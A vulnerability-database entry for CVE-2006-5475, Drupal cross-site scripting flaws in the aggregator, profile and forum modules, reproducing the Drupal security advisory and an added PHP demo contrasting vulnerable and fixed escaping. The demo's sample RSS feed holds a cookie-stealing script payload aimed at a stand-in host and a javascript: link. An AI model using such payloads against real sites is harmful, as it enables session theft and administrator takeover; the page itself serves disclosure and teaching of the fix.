Drupal XML Parser Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1193093    Vulnerability type: Cross-site scripting
Published: 2006-10-24    Updated: 2006-10-24
CVE ID: CVE-2006-5475    CNNVD ID: CNNVD-200610-389
Platform: N/A    CVSS score: 6.8
|Sources
https://www.securityfocus.com/bid/83650
https://cxsecurity.com/issue/WLB-2006100128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-389
|Vulnerability details
Drupal contains multiple cross-site scripting vulnerabilities. A remote attacker can inject arbitrary web script or HTML via a crafted RSS feed, because the XML parser used by the aggregator module passes unescaped feed data to the watchdog log on systems without PHP's mb_string extension; the aggregator, profile and forum modules also fail to escape the output of certain fields. Because the log is rendered on administrative pages, a successful XSS attack may lead to administrator access.
|Vulnerability EXP (advisory text)
----------------------------------------------------------------------------
Drupal security advisory                                  DRUPAL-SA-2006-024
----------------------------------------------------------------------------
Project:          Drupal core
Date:             2006-Oct-18
Security risk:    Moderately critical
Exploitable from: Remote
Vulnerability:    Cross site scripting
----------------------------------------------------------------------------
 
Description
-----------
Multiple XSS (cross site scripting) vulnerabilities have been discovered.

A bug in input validation and lack of output validation allows HTML and script 
insertion on several pages.

Drupal's XML parser passes unescaped data to watchdog under certain 
circumstances. A malicious user may execute an XSS attack via a specially 
crafted RSS feed. This vulnerability exists on systems that do not use PHP's 
mb_string extension (to check if mb_string is being used, navigate to 
admin/settings and look under "String handling"). Disabling the aggregator 
module provides an immediate workaround.

The aggregator module, profile module, and forum module do not properly escape 
output of certain fields.

Note: XSS attacks may lead to administrator access if certain conditions are 
met.
 
 
Versions affected
-----------------
- Drupal 4.6.x versions before Drupal 4.6.10
- Drupal 4.7.x versions before Drupal 4.7.4

Solution
--------
- If you are running Drupal 4.6.x then upgrade to Drupal 4.6.10.
   http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.6.10.tar.gz
- If you are running Drupal 4.7.x then upgrade to Drupal 4.7.4.
   http://ftp.osuosl.org/pub/drupal/files/projects/drupal-4.7.4.tar.gz

- To patch Drupal 4.6.9 use http://drupal.org/files/sa-2006-024/4.6.9.patch.
- To patch Drupal 4.7.3 use http://drupal.org/files/sa-2006-024/4.7.3.patch.

Please note that the patches only contain changes related to this advisory, and 
do not fix bugs that were solved in 4.6.10 or 4.7.4.

Reported by
-----------
- The XML parser vulnerability was reported by Erdem Köse.
- The forum module vulnerability was reported by Jim Phlew.
- The other vulnerabilities were found by members of the Drupal security team.

Contact
-------
The security contact for Drupal can be reached at security at drupal.org or 
using the form at http://drupal.org/contact.

// Uwe Hermann, on behalf of the Drupal Security Team.
-- 
Uwe Hermann 
http://www.hermann-uwe.de
http://www.it-services-uh.de  | http://www.crazy-hacks.org 
http://www.holsham-traders.de | http://www.unmaintained-free-software.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)

iD8DBQFFN7DxXdVoV3jWIbQRAm5IAJ0UmC80/DpS0I2WM8q9nPmxZdjtHQCeMiVP
jFhf+0xpVQz/7pXwh71hOAo=
=5y6Z
-----END PGP SIGNATURE-----
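The two defects the advisory describes (feed text reaching the watchdog log unescaped, and module output that does not escape certain fields) share one root cause: XML well-formedness is mistaken for HTML safety. The following standalone PHP script is an added example written for this page; it is not Drupal's own code and not part of the advisory. It builds a minimal aggregator-style parser on PHP's expat bindings, feeds it a constructed hostile RSS document, and shows a vulnerable log/render path beside a hardened one. `check_plain_equiv()` and `safe_url()` are stand-ins for the escaping that Drupal's `check_plain()` and `check_url()` perform, `log_item_*`, `render_item_*`, `$log` and `$hostile_feed` are names invented here, and the mb_string condition from the advisory is not modelled (the page does not say which code path depends on it).

```php
<?php
// Added example, not code from Drupal or from the advisory. All names below are
// constructed for this page. Requires the standard "xml" extension (expat).

// Constructed hostile feed. The payload is XML-escaped (&lt;script&gt;), so the
// document is perfectly well-formed; expat decodes the entities and hands the raw
// string "<script>..." to our handlers. XML validity says nothing about HTML safety.
$hostile_feed = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>Example feed</title>
    <item>
      <title>Deals &lt;script&gt;document.location='http://evil.example/?'+document.cookie&lt;/script&gt;</title>
      <link>javascript:alert(1)</link>
    </item>
  </channel>
</rss>
XML;

// Parse every <item> into ['title' => ..., 'link' => ..., 'description' => ...].
function parse_items(string $xml): array {
    $items = [];
    $current = null;   // array while inside an <item>, null otherwise
    $text = '';
    $parser = xml_parser_create('UTF-8');
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, 0);
    xml_set_element_handler(
        $parser,
        function ($p, string $name, array $attrs) use (&$current, &$text): void {
            $text = '';
            if ($name === 'item') {
                $current = [];
            }
        },
        function ($p, string $name) use (&$items, &$current, &$text): void {
            if ($current !== null && in_array($name, ['title', 'link', 'description'], true)) {
                $current[$name] = trim($text);
            }
            if ($name === 'item') {
                $items[] = $current;
                $current = null;
            }
            $text = '';
        }
    );
    // expat may deliver one text node in several chunks (e.g. around entities), so append.
    xml_set_character_data_handler($parser, function ($p, string $data) use (&$text): void {
        $text .= $data;
    });
    if (!xml_parse($parser, $xml, true)) {
        $error = xml_error_string(xml_get_error_code($parser));
        xml_parser_free($parser);
        throw new RuntimeException("XML parse error: $error");
    }
    xml_parser_free($parser);
    return $items;
}

// Stand-in for Drupal's check_plain(): escape for an HTML text or attribute context.
function check_plain_equiv(string $text): string {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Stand-in for the check_url() idea: attribute escaping alone does not stop
// javascript: URLs in href, so the scheme must be allow-listed as well.
function safe_url(string $url): string {
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https', 'ftp'], true) ? check_plain_equiv($url) : '#';
}

// Bug 1: a watchdog()-style log. Drupal renders stored messages as HTML on its admin
// log pages, so feed text logged verbatim runs in the administrator's browser.
function log_item_vulnerable(array &$log, array $item): void {
    $log[] = 'Fetched item: ' . $item['title'];                     // unescaped
}
function log_item_fixed(array &$log, array $item): void {
    $log[] = 'Fetched item: ' . check_plain_equiv($item['title']);  // escaped at the source
}

// Bug 2: module output. The same rule applies where the aggregator lists items.
function render_item_vulnerable(array $item): string {
    return '<a href="' . $item['link'] . '">' . $item['title'] . '</a>';
}
function render_item_fixed(array $item): string {
    return '<a href="' . safe_url($item['link']) . '">' . check_plain_equiv($item['title']) . '</a>';
}

$items = parse_items($hostile_feed);
$log = [];
log_item_vulnerable($log, $items[0]);
log_item_fixed($log, $items[0]);
echo "log (vulnerable):  {$log[0]}\n";   // contains a live <script> tag
echo "log (fixed):       {$log[1]}\n";   // contains &lt;script&gt; instead
echo "html (vulnerable): " . render_item_vulnerable($items[0]) . "\n";
echo "html (fixed):      " . render_item_fixed($items[0]) . "\n";
```

Run it with `php` on the command line and compare the four lines: the vulnerable log entry and anchor carry the decoded `<script>` element and a `javascript:` href, while the fixed versions carry `&lt;script&gt;` and a neutralised `#` link. The escaping has to happen where untrusted data enters an HTML context (the log message or the rendered page), which is exactly the place the advisory says the aggregator, profile and forum modules got wrong.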
|Affected products
- Drupal 4.7.3
- Drupal 4.7.2
- Drupal 4.7.1
- Drupal 4.7
- Drupal 4.6.9
- Drupal 4.6.8
- Drupal 4.6.7
|References

Source: VUPEN
Name: ADV-2006-4120
Link: http://www.frsirt.com/english/advisories/2006/4120
Source: SECUNIA
Name: 22486
Link: http://secunia.com/advisories/22486
Source: BUGTRAQ
Name: 20061019 [DRUPAL-SA-2006-024] Drupal 4.6.10 / 4.7.4 fixes multiple XSS issues
Link: http://www.securityfocus.com/archive/1/archive/1/449197/100/0/threaded
Source: OPENPKG
Name: OpenPKG-SA-2006.025-drupal
Link: http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.025-drupal.html
Source: drupal.org
Link: http://drupal.org/node/88826
Source: OSVDB
Name: 29922
Link: http://www.osvdb.org/29922
Source: SREASON
Name: 1766
Link: http://securityreason.com/securityalert/1766